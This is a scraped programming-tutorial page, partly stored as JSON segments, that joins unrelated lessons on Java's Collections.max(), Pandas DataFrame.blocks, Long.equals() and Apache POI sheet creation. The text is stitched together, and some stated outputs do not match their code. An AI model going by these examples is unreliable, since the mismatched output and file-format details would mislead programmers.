value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Max value is: 4 Example 2: for ClassCastException Java // Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add("Hello"); list.add((String)i); // printing the max value // using max() method System.out.println("Max value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String Example 3: for NoSuchElementException Java // Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println("Trying to get " + "the max from empty list"); System.out.println("Max value is: " + Collections.max(list)); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Trying to get the max from empty list Exception thrown : java.util.NoSuchElementException The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the order induced by the specified comparator. All elements in the collection must be mutually comparable by the specified comparator (that is, comp.compare(e1, e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection. Parameters: This method takes the following argument as a parameter coll – the collection whose maximum element is to be determined. comp – the comparator with which to determine the maximum element. A null value indicates that the elements’ natural ordering should be used. Return Value: This method returns the maximum element of the given collection, according to the specified comparator. Exception: This method throws following Exception: ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers). NoSuchElementException – if the collection is empty Below are the examples to illustrate the max() method Example 1: Java // Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println("Max val: " + Collections.max(list, Collections.reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Max val: -5 Example 2: for ClassCastException Java // Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add("Hello"); list.add((String)i); // printing the max value // using max() method System.out.println("Max val: " + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String Example 3: for NoSuchElementException Java // Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println("Trying to get " + "the max from empty list"); System.out.println("Max val: " + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println("Exception thrown : " + e); } catch (NoSuchElementException e) { System.out.println("Exception thrown : " + e); } }} Trying to get the max from empty list Exception thrown : java.util.NoSuchElementException Akanksha_Rai sweetyty Java - util package Java-Collections Java-Functions Java Java Java-Collections Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Initialize an ArrayList in Java Object Oriented Programming (OOPs) Concept in Java HashMap in Java with Examples Interfaces in Java How to iterate any Map in Java ArrayList in Java Multidimensional Arrays in Java Stream In Java Stack Class in Java Singleton Class in Java
[ { "code": null, "e": 24500, "s": 24472, "text": "\n11 May, 2021" }, { "code": null, "e": 25031, "s": 24500, "text": "The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the natural ordering of its elements. All elements in the collection must implement the Comparable interface. Furthermore, all elements in the collection must be mutually comparable (that is, e1.compareTo(e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection." }, { "code": null, "e": 25040, "s": 25031, "text": "Syntax: " }, { "code": null, "e": 25111, "s": 25040, "text": "public static <T extends Object & Comparable> T\n max(Collection coll)" }, { "code": null, "e": 25348, "s": 25111, "text": "Parameters: This method takes the collection coll as a parameter whose maximum element is to be determined.Return Value: This method returns the maximum element of the given collection, according to the natural ordering of its elements." }, { "code": null, "e": 25401, "s": 25348, "text": "Exception: This method throws following Exception: " }, { "code": null, "e": 25528, "s": 25401, "text": "ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers)." }, { "code": null, "e": 25580, "s": 25528, "text": "NoSuchElementException – if the collection is empty" }, { "code": null, "e": 25634, "s": 25580, "text": "Below are the examples to illustrate the max() method" }, { "code": null, "e": 25647, "s": 25634, "text": "Example 1: " }, { "code": null, "e": 25652, "s": 25647, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 26490, "s": 25652, "text": null }, { "code": null, "e": 26506, "s": 26490, "text": "Max value is: 4" }, { "code": null, "e": 26543, "s": 26508, "text": "Example 2: for ClassCastException " }, { "code": null, "e": 26548, "s": 26543, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add(\"Hello\"); list.add((String)i); // printing the max value // using max() method System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 27444, "s": 26548, "text": null }, { "code": null, "e": 27546, "s": 27444, "text": "Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String" }, { "code": null, "e": 27587, "s": 27548, "text": "Example 3: for NoSuchElementException " }, { "code": null, "e": 27592, "s": 27587, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println(\"Trying to get \" + \"the max from empty list\"); System.out.println(\"Max value is: \" + Collections.max(list)); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 28406, "s": 27592, "text": null }, { "code": null, "e": 28496, "s": 28406, "text": "Trying to get the max from empty list\nException thrown : java.util.NoSuchElementException" }, { "code": null, "e": 28985, "s": 28498, "text": "The max() method of java.util.Collections class is used to return the maximum element of the given collection, according to the order induced by the specified comparator. All elements in the collection must be mutually comparable by the specified comparator (that is, comp.compare(e1, e2) must not throw a ClassCastException for any elements e1 and e2 in the collection).This method iterates over the entire collection, hence it requires time proportional to the size of the collection." }, { "code": null, "e": 29054, "s": 28985, "text": "Parameters: This method takes the following argument as a parameter " }, { "code": null, "e": 29119, "s": 29054, "text": "coll – the collection whose maximum element is to be determined." }, { "code": null, "e": 29261, "s": 29119, "text": "comp – the comparator with which to determine the maximum element. A null value indicates that the elements’ natural ordering should be used." }, { "code": null, "e": 29379, "s": 29261, "text": "Return Value: This method returns the maximum element of the given collection, according to the specified comparator." }, { "code": null, "e": 29432, "s": 29379, "text": "Exception: This method throws following Exception: " }, { "code": null, "e": 29559, "s": 29432, "text": "ClassCastException – if the collection contains elements that are not mutually comparable (for example, strings and integers)." }, { "code": null, "e": 29611, "s": 29559, "text": "NoSuchElementException – if the collection is empty" }, { "code": null, "e": 29665, "s": 29611, "text": "Below are the examples to illustrate the max() method" }, { "code": null, "e": 29678, "s": 29665, "text": "Example 1: " }, { "code": null, "e": 29683, "s": 29678, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for Integer value import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // Adding element to Vector v list.add(-1); list.add(4); list.add(-5); list.add(1); // printing the max value // using max() method System.out.println(\"Max val: \" + Collections.max(list, Collections.reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 30592, "s": 29683, "text": null }, { "code": null, "e": 30604, "s": 30592, "text": "Max val: -5" }, { "code": null, "e": 30641, "s": 30606, "text": "Example 2: for ClassCastException " }, { "code": null, "e": 30646, "s": 30641, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for ClassCastException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<String> list = new LinkedList<String>(); // creating variable of object type Object i = Integer.valueOf(42); // Adding element to Vector v list.add(\"Hello\"); list.add((String)i); // printing the max value // using max() method System.out.println(\"Max val: \" + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 31689, "s": 30646, "text": null }, { "code": null, "e": 31791, "s": 31689, "text": "Exception thrown : java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.String" }, { "code": null, "e": 31832, "s": 31793, "text": "Example 3: for NoSuchElementException " }, { "code": null, "e": 31837, "s": 31832, "text": "Java" }, { "code": "// Java program to demonstrate// max() method for NoSuchElementException import java.util.*; public class GFG1 { public static void main(String[] argv) throws Exception { try { // creating object of LinkedList List<Integer> list = new LinkedList<Integer>(); // printing the max value // using max() method System.out.println(\"Trying to get \" + \"the max from empty list\"); System.out.println(\"Max val: \" + Collections .max(list, Collections .reverseOrder())); } catch (ClassCastException e) { System.out.println(\"Exception thrown : \" + e); } catch (NoSuchElementException e) { System.out.println(\"Exception thrown : \" + e); } }}", "e": 32798, "s": 31837, "text": null }, { "code": null, "e": 32888, "s": 32798, "text": "Trying to get the max from empty list\nException thrown : java.util.NoSuchElementException" }, { "code": null, "e": 32903, "s": 32890, "text": "Akanksha_Rai" }, { "code": null, "e": 32912, "s": 32903, "text": "sweetyty" }, { "code": null, "e": 32932, "s": 32912, "text": "Java - util package" }, { "code": null, "e": 32949, "s": 32932, "text": "Java-Collections" }, { "code": null, "e": 32964, "s": 32949, "text": "Java-Functions" }, { "code": null, "e": 32969, "s": 32964, "text": "Java" }, { "code": null, "e": 32974, "s": 32969, "text": "Java" }, { "code": null, "e": 32991, "s": 32974, "text": "Java-Collections" }, { "code": null, "e": 33089, "s": 32991, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 33121, "s": 33089, "text": "Initialize an ArrayList in Java" }, { "code": null, "e": 33172, "s": 33121, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 33202, "s": 33172, "text": "HashMap in Java with Examples" }, { "code": null, "e": 33221, "s": 33202, "text": "Interfaces in Java" }, { "code": null, "e": 33252, "s": 33221, "text": "How to iterate any Map in Java" }, { "code": null, "e": 33270, "s": 33252, "text": "ArrayList in Java" }, { "code": null, "e": 33302, "s": 33270, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 33317, "s": 33302, "text": "Stream In Java" }, { "code": null, "e": 33337, "s": 33317, "text": "Stack Class in Java" } ]
Python | Pandas DataFrame.blocks
20 Feb, 2019 Pandas DataFrame is a two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). Arithmetic operations align on both row and column labels. It can be thought of as a dict-like container for Series objects. This is the primary data structure of the Pandas. Pandas DataFrame.blocks attribute is synonym for as_blocks() function. It basically convert the frame to a dict of dtype -> Constructor Types that each has a homogeneous dtype. Syntax: DataFrame.blocks Parameter : None Returns : dict Example #1: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types. # importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({'Weight':[45, 88, 56, 15, 71], 'Name':['Sam', 'Andrea', 'Alex', 'Robin', 'Kia'], 'Age':[14, 25, 55, 8, 21]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df) Output : Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe. # return a dictionaryresult = df.blocks # Print the resultprint(result) Output : As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block. Example #2: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types. # importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({"A":[12, 4, 5, None, 1], "B":[7, 2, 54, 3, None], "C":[20, 16, 11, 3, 8], "D":[14, 3, None, 2, 6]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df) Output : Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe. # return a dictionaryresult = df.blocks # Print the resultprint(result) Output : As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block. Python pandas-dataFrame Python pandas-dataFrame-methods Python-pandas Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Install PIP on Windows ? Python Classes and Objects Python | os.path.join() method Introduction To PYTHON Python OOPs Concepts How to drop one or multiple columns in Pandas Dataframe How To Convert Python Dictionary To JSON? Check if element exists in list in Python Python | Get unique values from a list Create a directory in Python
[ { "code": null, "e": 28, "s": 0, "text": "\n20 Feb, 2019" }, { "code": null, "e": 342, "s": 28, "text": "Pandas DataFrame is a two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). Arithmetic operations align on both row and column labels. It can be thought of as a dict-like container for Series objects. This is the primary data structure of the Pandas." }, { "code": null, "e": 519, "s": 342, "text": "Pandas DataFrame.blocks attribute is synonym for as_blocks() function. It basically convert the frame to a dict of dtype -> Constructor Types that each has a homogeneous dtype." }, { "code": null, "e": 544, "s": 519, "text": "Syntax: DataFrame.blocks" }, { "code": null, "e": 561, "s": 544, "text": "Parameter : None" }, { "code": null, "e": 576, "s": 561, "text": "Returns : dict" }, { "code": null, "e": 696, "s": 576, "text": "Example #1: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({'Weight':[45, 88, 56, 15, 71], 'Name':['Sam', 'Andrea', 'Alex', 'Robin', 'Kia'], 'Age':[14, 25, 55, 8, 21]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df)", "e": 1069, "s": 696, "text": null }, { "code": null, "e": 1078, "s": 1069, "text": "Output :" }, { "code": null, "e": 1180, "s": 1078, "text": "Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe." }, { "code": "# return a dictionaryresult = df.blocks # Print the resultprint(result)", "e": 1253, "s": 1180, "text": null }, { "code": null, "e": 1262, "s": 1253, "text": "Output :" }, { "code": null, "e": 1569, "s": 1262, "text": "As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block. Example #2: Use DataFrame.blocks attribute to return a dictionary containing the data in blocks of separate data types." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the DataFramedf = pd.DataFrame({\"A\":[12, 4, 5, None, 1], \"B\":[7, 2, 54, 3, None], \"C\":[20, 16, 11, 3, 8], \"D\":[14, 3, None, 2, 6]}) # Create the indexindex_ = ['Row_1', 'Row_2', 'Row_3', 'Row_4', 'Row_5'] # Set the indexdf.index = index_ # Print the DataFrameprint(df)", "e": 1955, "s": 1569, "text": null }, { "code": null, "e": 1964, "s": 1955, "text": "Output :" }, { "code": null, "e": 2066, "s": 1964, "text": "Now we will use DataFrame.blocks attribute to return the block representation of the given dataframe." }, { "code": "# return a dictionaryresult = df.blocks # Print the resultprint(result)", "e": 2139, "s": 2066, "text": null }, { "code": null, "e": 2148, "s": 2139, "text": "Output :" }, { "code": null, "e": 2335, "s": 2148, "text": "As we can see in the output, the DataFrame.blocks attribute has successfully returned a dictionary containing the data of the dataframe. Homogeneous columns are places in the same block." }, { "code": null, "e": 2359, "s": 2335, "text": "Python pandas-dataFrame" }, { "code": null, "e": 2391, "s": 2359, "text": "Python pandas-dataFrame-methods" }, { "code": null, "e": 2405, "s": 2391, "text": "Python-pandas" }, { "code": null, "e": 2412, "s": 2405, "text": "Python" }, { "code": null, "e": 2510, "s": 2412, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 2542, "s": 2510, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 2569, "s": 2542, "text": "Python Classes and Objects" }, { "code": null, "e": 2600, "s": 2569, "text": "Python | os.path.join() method" }, { "code": null, "e": 2623, "s": 2600, "text": "Introduction To PYTHON" }, { "code": null, "e": 2644, "s": 2623, "text": "Python OOPs Concepts" }, { "code": null, "e": 2700, "s": 2644, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 2742, "s": 2700, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 2784, "s": 2742, "text": "Check if element exists in list in Python" }, { "code": null, "e": 2823, "s": 2784, "text": "Python | Get unique values from a list" } ]
Java Long equals() method with Examples
05 Dec, 2018 The java.lang.Long.equals() is a built-in function in java that compares this object to the specified object. The result is true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if both the objects are not same. In all other cases, compareTo method should be preferred. Syntax: public boolean equals(Object obj) Parameter: obj - The passed object is the object that is to be compared with. Returns:The function returns a boolean value after comparing with the object passed in the parameter. It returns true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if the object are not same. Program 1: The program below demonstrates the working of function. // Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { public static void main(String args[]) { // when two objects are different Long obj1 = new Long(123123); Long obj2 = new Long(164165); System.out.print("Object1 & Object2: "); if (obj1.equals(obj2)) System.out.println("Equal"); else System.out.println("Not equal"); // when two objects are equal obj1 = new Long(12345); obj2 = new Long(12345); System.out.print("Object1 & Object2: "); if (obj1.equals(obj2)) System.out.print("Equal"); else System.out.print("Not Equal"); }} Output: object1 and object2 are not equal object1 and object2 are equal Program 2: The program below demonstrates the working of function when no argument is passed // Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when no argument is passed Long obj1 = new Long(124); Long obj2 = new Long(167); System.out.print("Object1 & Object2: "); if (obj1.equals()) System.out.println("Equal"); else System.out.println("Not Equal"); }} Output: prog.java:15: error: no suitable method found for equals(no arguments) if(obj1.equals()) ^ method Object.equals(Object) is not applicable (actual and formal argument lists differ in length) method Long.equals(Object) is not applicable (actual and formal argument lists differ in length) 1 error Program 3: The program below demonstrates the working of function when anything other than the object is passed in an argument // Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when anything other than argument is passed Long obj1 = new Long(124); System.out.print("Object1 & Object2: "); if (obj1.equals("gfg")) System.out.println("Equal"); else System.out.println("Not Equal"); }} Output: Object1 & Object2: Not Equal Java-Functions Java-lang package java-Long Java Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Object Oriented Programming (OOPs) Concept in Java How to iterate any Map in Java Interfaces in Java HashMap in Java with Examples ArrayList in Java Stream In Java Collections in Java Multidimensional Arrays in Java Singleton Class in Java Stack Class in Java
[ { "code": null, "e": 28, "s": 0, "text": "\n05 Dec, 2018" }, { "code": null, "e": 377, "s": 28, "text": "The java.lang.Long.equals() is a built-in function in java that compares this object to the specified object. The result is true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if both the objects are not same. In all other cases, compareTo method should be preferred." }, { "code": null, "e": 385, "s": 377, "text": "Syntax:" }, { "code": null, "e": 503, "s": 385, "text": "public boolean equals(Object obj) \n\nParameter: \nobj - The passed object is the object that is to be compared with. \n" }, { "code": null, "e": 777, "s": 503, "text": "Returns:The function returns a boolean value after comparing with the object passed in the parameter. It returns true if and only if the argument is not null and is a Long object that contains the same long value as this object. It returns false if the object are not same." }, { "code": null, "e": 844, "s": 777, "text": "Program 1: The program below demonstrates the working of function." }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { public static void main(String args[]) { // when two objects are different Long obj1 = new Long(123123); Long obj2 = new Long(164165); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(obj2)) System.out.println(\"Equal\"); else System.out.println(\"Not equal\"); // when two objects are equal obj1 = new Long(12345); obj2 = new Long(12345); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(obj2)) System.out.print(\"Equal\"); else System.out.print(\"Not Equal\"); }}", "e": 1564, "s": 844, "text": null }, { "code": null, "e": 1572, "s": 1564, "text": "Output:" }, { "code": null, "e": 1637, "s": 1572, "text": "object1 and object2 are not equal\nobject1 and object2 are equal\n" }, { "code": null, "e": 1730, "s": 1637, "text": "Program 2: The program below demonstrates the working of function when no argument is passed" }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when no argument is passed Long obj1 = new Long(124); Long obj2 = new Long(167); System.out.print(\"Object1 & Object2: \"); if (obj1.equals()) System.out.println(\"Equal\"); else System.out.println(\"Not Equal\"); }}", "e": 2183, "s": 1730, "text": null }, { "code": null, "e": 2191, "s": 2183, "text": "Output:" }, { "code": null, "e": 2526, "s": 2191, "text": "prog.java:15: error: no suitable method found for equals(no arguments)\n if(obj1.equals())\n ^\n method Object.equals(Object) is not applicable\n (actual and formal argument lists differ in length)\n method Long.equals(Object) is not applicable\n (actual and formal argument lists differ in length)\n1 error\n" }, { "code": null, "e": 2653, "s": 2526, "text": "Program 3: The program below demonstrates the working of function when anything other than the object is passed in an argument" }, { "code": "// Java program to demonstrate// of java.lang.Long.equals() methodimport java.lang.Math; class Gfg1 { // driver code public static void main(String args[]) { // when anything other than argument is passed Long obj1 = new Long(124); System.out.print(\"Object1 & Object2: \"); if (obj1.equals(\"gfg\")) System.out.println(\"Equal\"); else System.out.println(\"Not Equal\"); }}", "e": 3098, "s": 2653, "text": null }, { "code": null, "e": 3106, "s": 3098, "text": "Output:" }, { "code": null, "e": 3137, "s": 3106, "text": "Object1 & Object2: Not Equal\n" }, { "code": null, "e": 3152, "s": 3137, "text": "Java-Functions" }, { "code": null, "e": 3170, "s": 3152, "text": "Java-lang package" }, { "code": null, "e": 3180, "s": 3170, "text": "java-Long" }, { "code": null, "e": 3185, "s": 3180, "text": "Java" }, { "code": null, "e": 3190, "s": 3185, "text": "Java" }, { "code": null, "e": 3288, "s": 3190, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 3339, "s": 3288, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 3370, "s": 3339, "text": "How to iterate any Map in Java" }, { "code": null, "e": 3389, "s": 3370, "text": "Interfaces in Java" }, { "code": null, "e": 3419, "s": 3389, "text": "HashMap in Java with Examples" }, { "code": null, "e": 3437, "s": 3419, "text": "ArrayList in Java" }, { "code": null, "e": 3452, "s": 3437, "text": "Stream In Java" }, { "code": null, "e": 3472, "s": 3452, "text": "Collections in Java" }, { "code": null, "e": 3504, "s": 3472, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 3528, "s": 3504, "text": "Singleton Class in Java" } ]
Creating Sheets in Excel File in Java using Apache POI
11 Jul, 2022 Apache POI is an open-source java library to create and manipulate various file formats based on Microsoft Office. Using POI, one should be able to perform create, modify and display/read operations on the following file formats. For Example, java doesn’t provide built-in support for working with excel files, so we need to look for open-source APIs for the job. Apache POI provides Java API for manipulating various file formats based on the Office Open XML (OOXML) standard and OLE2 standard from Microsoft. Apache POI releases are available under the Apache License (V2.0). Implementation: Before we move ahead it is suggested geeks you must be well versed with how to read files in the Apache POI library. it does include fundamental interfaces such as Workbook, Sheet, Row, and Cell. For a given Excel file say here it be ‘Geeks.xlsx’, it is needed to create sheets in it then do follow these below generic steps as listed below: Step 1: Create a Java Maven project Step 2: Add dependency in the pom.xml file. It is as shown below in the media file. Example XML <!-- https://mvnrepository.com/artifact/org.apache.poi/poi --><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi</artifactId> <version>3.12</version></dependency><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>3.12</version></dependency> Step 3: Create a class in the ‘javaResource’ Folder. Java // Java Program to Illustrate Creating Sheets In Excel File// Using Apache POI // Importing required classesimport java.io.*;import org.apache.poi.hssf.usermodel.HSSFWorkbook;import org.apache.poi.ss.usermodel.Sheet;import org.apache.poi.ss.usermodel.Workbook; // Main class// CreatingSheetpublic class GFG { // Main driver method public static void main(String[] args) throws FileNotFoundException, IOException { // Creating Workbook instances Workbook wb = new HSSFWorkbook(); // An output stream accepts output bytes and // sends them to sink OutputStream fileOut = new FileOutputStream("Geeks.xlsx"); // Now creating Sheets using sheet object Sheet sheet1 = wb.createSheet("Array"); Sheet sheet2 = wb.createSheet("String"); Sheet sheet3 = wb.createSheet("LinkedList"); Sheet sheet4 = wb.createSheet("Tree"); Sheet sheet5 = wb.createSheet("Dynamic Programing"); Sheet sheet6 = wb.createSheet("Puzzles"); // Display message on console for successful // execution of program System.out.println( "Sheets Has been Created successfully"); // Finding number of Sheets present in Workbook int numberOfSheets = wb.getNumberOfSheets(); System.out.println("Total Number of Sheets: " + numberOfSheets); wb.write(fileOut); }} Output: On console Sheets Has been Created successfully Total Number of Sheets: 6 Output: Changes inside the Excel file are depicted in below visual aid provided. Output explanation: Here 6 sheets will be created in the Excel file passed in the above program that is ‘geeks.xlsx‘ as shown in the below media provided. solankimayank surindertarika1234 nandinigujral Java Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 54, "s": 26, "text": "\n11 Jul, 2022" }, { "code": null, "e": 419, "s": 54, "text": "Apache POI is an open-source java library to create and manipulate various file formats based on Microsoft Office. Using POI, one should be able to perform create, modify and display/read operations on the following file formats. For Example, java doesn’t provide built-in support for working with excel files, so we need to look for open-source APIs for the job. " }, { "code": null, "e": 634, "s": 419, "text": "Apache POI provides Java API for manipulating various file formats based on the Office Open XML (OOXML) standard and OLE2 standard from Microsoft. Apache POI releases are available under the Apache License (V2.0). " }, { "code": null, "e": 650, "s": 634, "text": "Implementation:" }, { "code": null, "e": 992, "s": 650, "text": "Before we move ahead it is suggested geeks you must be well versed with how to read files in the Apache POI library. it does include fundamental interfaces such as Workbook, Sheet, Row, and Cell. For a given Excel file say here it be ‘Geeks.xlsx’, it is needed to create sheets in it then do follow these below generic steps as listed below:" }, { "code": null, "e": 1028, "s": 992, "text": "Step 1: Create a Java Maven project" }, { "code": null, "e": 1112, "s": 1028, "text": "Step 2: Add dependency in the pom.xml file. It is as shown below in the media file." }, { "code": null, "e": 1121, "s": 1112, "text": "Example " }, { "code": null, "e": 1125, "s": 1121, "text": "XML" }, { "code": "<!-- https://mvnrepository.com/artifact/org.apache.poi/poi --><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi</artifactId> <version>3.12</version></dependency><dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>3.12</version></dependency>", "e": 1436, "s": 1125, "text": null }, { "code": null, "e": 1489, "s": 1436, "text": "Step 3: Create a class in the ‘javaResource’ Folder." }, { "code": null, "e": 1494, "s": 1489, "text": "Java" }, { "code": "// Java Program to Illustrate Creating Sheets In Excel File// Using Apache POI // Importing required classesimport java.io.*;import org.apache.poi.hssf.usermodel.HSSFWorkbook;import org.apache.poi.ss.usermodel.Sheet;import org.apache.poi.ss.usermodel.Workbook; // Main class// CreatingSheetpublic class GFG { // Main driver method public static void main(String[] args) throws FileNotFoundException, IOException { // Creating Workbook instances Workbook wb = new HSSFWorkbook(); // An output stream accepts output bytes and // sends them to sink OutputStream fileOut = new FileOutputStream(\"Geeks.xlsx\"); // Now creating Sheets using sheet object Sheet sheet1 = wb.createSheet(\"Array\"); Sheet sheet2 = wb.createSheet(\"String\"); Sheet sheet3 = wb.createSheet(\"LinkedList\"); Sheet sheet4 = wb.createSheet(\"Tree\"); Sheet sheet5 = wb.createSheet(\"Dynamic Programing\"); Sheet sheet6 = wb.createSheet(\"Puzzles\"); // Display message on console for successful // execution of program System.out.println( \"Sheets Has been Created successfully\"); // Finding number of Sheets present in Workbook int numberOfSheets = wb.getNumberOfSheets(); System.out.println(\"Total Number of Sheets: \" + numberOfSheets); wb.write(fileOut); }}", "e": 2925, "s": 1494, "text": null }, { "code": null, "e": 2944, "s": 2925, "text": "Output: On console" }, { "code": null, "e": 3007, "s": 2944, "text": "Sheets Has been Created successfully\nTotal Number of Sheets: 6" }, { "code": null, "e": 3088, "s": 3007, "text": "Output: Changes inside the Excel file are depicted in below visual aid provided." }, { "code": null, "e": 3109, "s": 3088, "text": "Output 